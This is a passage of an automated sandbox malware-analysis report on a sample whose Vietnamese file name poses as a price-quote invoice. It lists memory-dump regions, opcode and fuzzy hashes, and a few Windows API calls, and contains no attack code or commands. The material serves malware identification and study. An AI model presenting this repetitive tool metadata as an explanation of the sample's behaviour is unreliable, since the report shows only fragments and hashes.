                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                  • Opcode ID: f6be2ed17b8fbd897612acf9fb148a91cddab0101b1b7620a752d4d7aad0e73c
                                                                                                                                                                                                                                                                  • Instruction ID: 3a56172850a88a908d36346b0b4fa3d62a657973f1588c19a7706a7f0175c8e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6be2ed17b8fbd897612acf9fb148a91cddab0101b1b7620a752d4d7aad0e73c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7321C4B5D002599FDB10CF9AD584ADEBBF8EB48324F14845AE954A3310D378A954CFA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B49931,00000800,00000000,00000000), ref: 00B49B42
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9dd409af4cde3c88227e85ce9be44c3092e1e27acea40d3975eac9e35b310d72
                                                                                                                                                                                                                                                                  • Instruction ID: e4b1be605efa9a87e004337daf03e77ca7cf9c6503fe77e872c417ce0cb3d855
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dd409af4cde3c88227e85ce9be44c3092e1e27acea40d3975eac9e35b310d72
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A1103B69002498FDB10CF9AD444BDEFBF4EB48324F14846AD515A7200C3B8A945CFA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B49931,00000800,00000000,00000000), ref: 00B49B42
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                  • Opcode ID: 04ab20cebcbb5daa03a06ddf304b72e6bbc9936d1642d8417c9cbb9858ac30c4
                                                                                                                                                                                                                                                                  • Instruction ID: 5082c4308247ed3fba16479d39db50ee53fc2d87c86202e9a645f8c24437404f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04ab20cebcbb5daa03a06ddf304b72e6bbc9936d1642d8417c9cbb9858ac30c4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 701103B69002498FDB10CFAAD444BDEFBF4EF88324F14846AD555A7200C379A946CFA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00B498B6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                  • Opcode ID: f8a7a4c782eddd1af7a89769ca4e2058795457cb4aa2ab77dadca7c9d8f2f23d
                                                                                                                                                                                                                                                                  • Instruction ID: 8984a657abd4808efc5caa564b79e4625c348d99bc51d59cfc46fca2f4ff9f43
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8a7a4c782eddd1af7a89769ca4e2058795457cb4aa2ab77dadca7c9d8f2f23d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7511E0B6C002498FDB10CF9AD444BDEFBF4EB89324F14856AD829B7600C378A645CFA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: O
                                                                                                                                                                                                                                                                  • API String ID: 0-878818188
                                                                                                                                                                                                                                                                  • Opcode ID: 80b88cc75390e3f923ced0347d0af9012884e96b043f5346938e5b9c37993ad4
                                                                                                                                                                                                                                                                  • Instruction ID: 73bb23df81f337e949b2660946de7c0b6557b13bcd4ccd4fc011aebd006b2acf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80b88cc75390e3f923ced0347d0af9012884e96b043f5346938e5b9c37993ad4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F015AB0D0421C8FD715EF6AD4047ADB6F9FB9E344F008096D109BB245D7785A81CF55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: [
                                                                                                                                                                                                                                                                  • API String ID: 0-784033777
                                                                                                                                                                                                                                                                  • Opcode ID: f3c4b579a8941c37d6c3e97326194b86a5c0c8234c7334712a024303e1477596
                                                                                                                                                                                                                                                                  • Instruction ID: 60fa36fdd60554892f495d7b4e68e77070033267ef9b6f2a055d49fe8696a059
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3c4b579a8941c37d6c3e97326194b86a5c0c8234c7334712a024303e1477596
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF015789082188FEB11EF79C8087ADBBF1EB88304F2040D9951DBB345D7389E848F10
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8d32b4eb0bf8fba6415a4ba05646d2bf33d9c06c903c77163d3e2e9732c26b24
                                                                                                                                                                                                                                                                  • Instruction ID: e5d214a6475e6302ae3d3ad7cb6de9da04e6c7b49dbdb39634fc458022e546e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d32b4eb0bf8fba6415a4ba05646d2bf33d9c06c903c77163d3e2e9732c26b24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8292067190066DDFEB259B60C891BDDB7B2EF85304F1181EAD60AAB260DF315E84DF81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c513c11a00f125abb1411bda812308dd2e4ea4b4604274c019d387394c99b5b6
                                                                                                                                                                                                                                                                  • Instruction ID: d187359de08da57e38374baca6dc1d89c0cc80ae47de2f73ff7ef7c8e12fd9e3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c513c11a00f125abb1411bda812308dd2e4ea4b4604274c019d387394c99b5b6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA2227B5A00219DFDB24DF64D854AAE77B2FF88314F218168E906EB365DB30ED11CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b12123652774746e47697e02c300ca0b8ad7df70dfa8362c8ff3754aef9c83af
                                                                                                                                                                                                                                                                  • Instruction ID: 345bdbdf67f0146b83ca186c809d02509e0c99e150a1d70c4a20e8aefc5991d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b12123652774746e47697e02c300ca0b8ad7df70dfa8362c8ff3754aef9c83af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 951252B0A002199FCB14DFA9C4946AEB7F2FF89304F248429E549EB754DB35ED41CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 661f39d049dac97401e1378ac37769ded5a191cefcee67b88c9c5bcb836b9289
                                                                                                                                                                                                                                                                  • Instruction ID: 15bb76019606ddef0a46987161ff8409d210dd58862f33c2588f3ba04e6e4cd8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 661f39d049dac97401e1378ac37769ded5a191cefcee67b88c9c5bcb836b9289
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FC15AB0B102199BDB14DFA5D854AAEBBB2EF99304F14852DD502EB360EF74DC06CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 848d4d40fa26a6cdf33a69c34876aa33d4bf7696014a77c3ec882f884d6a82e8
                                                                                                                                                                                                                                                                  • Instruction ID: 603d0febf23cf9013d9f0e1015c35a59327806f8d3250b86f486478316b0a0c2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 848d4d40fa26a6cdf33a69c34876aa33d4bf7696014a77c3ec882f884d6a82e8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCB100B0314B018FD725CB68C455A2ABBF6EF85304F15C45EE54ACB792DBB8E841CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0dbd0bab0c8df88d9c1e55bca1f4e09282d7688b5978a409ae5b7fbfdcdbe090
                                                                                                                                                                                                                                                                  • Instruction ID: ae2562328a45cbae0e2c0658fdcfae3a4baacf084a382d5b427d2dc8a1ad8e42
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbd0bab0c8df88d9c1e55bca1f4e09282d7688b5978a409ae5b7fbfdcdbe090
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78B14CB8959208CFDB12CFA8D444BEDBBB8FB0E398F14A555D019AB291C7744885CF21
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5a12236b516f1ea25a3dd7f0f234b558515153046b1298f183dd0072a81e6001
                                                                                                                                                                                                                                                                  • Instruction ID: 9386a9b3a8bf3b1aafa287f6d73a853e691503cbd24a8c2361078e996ced4dd2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a12236b516f1ea25a3dd7f0f234b558515153046b1298f183dd0072a81e6001
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBB108B4B0061ADFDF14DFA9D494A9DB7B6BF89344B108029E906EB361DB34ED41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 52580bdce42c3bd96379bfdecd3dc7ba52c22f6f67237222eb5e850692401b22
                                                                                                                                                                                                                                                                  • Instruction ID: 51b8bd328614ce5b76c341f48d838381bce3173236ea330122da767f88ba94b9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52580bdce42c3bd96379bfdecd3dc7ba52c22f6f67237222eb5e850692401b22
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50B158B47006019FDB15DF38C58996ABBE2BF89244B148A6DE946CB3A5DF34E805CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 172c397c24a6e662a86d2ded20220191a3a7f115cddf37b0527c7ee231f163ea
                                                                                                                                                                                                                                                                  • Instruction ID: cb0fa9e15572c4f478a0a1aa2b04b62b83d46ffe1f20c59649776f0423fca73e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 172c397c24a6e662a86d2ded20220191a3a7f115cddf37b0527c7ee231f163ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F81C1B07042458FCB14DF68C494A6EBBF2EF89344B2584ADD506DB362DB31EC02CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e52a54622d257be14c60eb0962d93235d0e4c6f354b3ad3bf6c42c8ab76b9d0d
                                                                                                                                                                                                                                                                  • Instruction ID: 9cca96071b9a98cf4fd1c42b7b7e6bd09ab36a9d94a3a72234142e09889f6652
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e52a54622d257be14c60eb0962d93235d0e4c6f354b3ad3bf6c42c8ab76b9d0d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E912BB8959208CFDB12CFA8D4447EDBBB9FB0F398F246555D019AB291C3744885CF25
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b2f75078714ce5182a674d3ea9e197c995a3e60dca58d0d843bc2ec070ac7e9a
                                                                                                                                                                                                                                                                  • Instruction ID: d1d0aef20d194bbf64a557a6fed1b5de57f3821929f011d284368bee07ddf900
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2f75078714ce5182a674d3ea9e197c995a3e60dca58d0d843bc2ec070ac7e9a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E913CB8959208CFDB12CFA8D444BEDBBB9FB0F398F24A555D019AB291C3744885CF25
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 34ac10d4f311bae07a904f14f98fff800c2acc43eca587cd26dd129ad823b6d1
                                                                                                                                                                                                                                                                  • Instruction ID: 9a2caeff15ab7a3bd4e2ae77971a287f4171b7ca2fe8d00fc3a656f122ba19b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34ac10d4f311bae07a904f14f98fff800c2acc43eca587cd26dd129ad823b6d1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92913CB8959208CFDB12CFA8D444BEDBBB9FB0F398F24A555D019AB291C3744885CF25
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2a1d73e65841b460dbb9c729600b70f1f544eefb437ee9d1d6251e7bd1e1ce83
                                                                                                                                                                                                                                                                  • Instruction ID: 8f929ac39ac3f6fe0e706aaf83e0bd88d8a75f30b4d6f979707ccd234a913722
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1d73e65841b460dbb9c729600b70f1f544eefb437ee9d1d6251e7bd1e1ce83
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B57135B57052068FDB15DF35E881AAABBF6FF84344B0485ADC505CB6A6DB30F815CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4687976d4ed5938ae34db1355b648d8e03e457ed023c6b220355b79371abd5ee
                                                                                                                                                                                                                                                                  • Instruction ID: 97c3573852d69b6f59d1c80339a39744768456e2d456b636512e9d5e7dc7d8ac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4687976d4ed5938ae34db1355b648d8e03e457ed023c6b220355b79371abd5ee
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E8156F4A19218CBDB20CF98C8057EEBBB8FB4F388F005259D419BB281C7785A55CB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1c01b7f21adaef0820626b6bf99ed8867f44db90dc9802fdd852c808cb334e41
                                                                                                                                                                                                                                                                  • Instruction ID: a1f23b8846df5f920c462d0d2f798ee604146f6fb30f506f65e10a4d33271b4d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c01b7f21adaef0820626b6bf99ed8867f44db90dc9802fdd852c808cb334e41
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 857196B171095ADFCF18EF68C849A2E7BB6EF99644B118069E906DB370CB31DC11CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 51b63dd7ba9d7c18a6afd2db91d0f709e34e956ba9902b1bca6fd963e1d0b6a9
                                                                                                                                                                                                                                                                  • Instruction ID: 473f876ac901327858b347744c4e1bfdd549478b835b90c63c60050f6febdc49
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51b63dd7ba9d7c18a6afd2db91d0f709e34e956ba9902b1bca6fd963e1d0b6a9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 575126B030495A1FEB14EB7998547AE33DADFC5258B1641AED20ACF7A1DF30EC058392
                                                                                                                                                                                                                                                                  Uniqueness

